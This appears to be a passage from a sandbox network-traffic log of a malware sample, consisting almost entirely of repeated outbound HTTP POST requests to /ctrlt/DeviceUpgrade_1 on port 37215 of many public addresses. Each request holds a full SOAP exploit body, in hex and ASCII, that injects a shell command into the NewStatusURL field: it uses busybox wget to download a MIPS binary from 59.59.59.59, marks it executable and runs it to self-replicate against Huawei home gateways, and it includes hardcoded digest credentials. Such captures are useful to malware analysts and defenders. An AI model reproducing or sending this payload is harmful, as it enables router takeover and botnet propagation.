                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1143192.168.2.1535708157.136.144.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.745172977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1144192.168.2.155482841.255.87.16037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.745388031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1145192.168.2.1554102150.220.214.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.745441914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1146192.168.2.1557206197.66.187.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.745881081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1147192.168.2.154905698.168.212.11837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.745951891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1148192.168.2.1536616197.150.222.12737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.745971918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1149192.168.2.1559394103.52.218.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.745986938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1150192.168.2.1557852197.245.24.24137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.746018887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1151192.168.2.1539182157.133.103.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.746088028 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1152192.168.2.1550964157.200.251.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.746113062 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
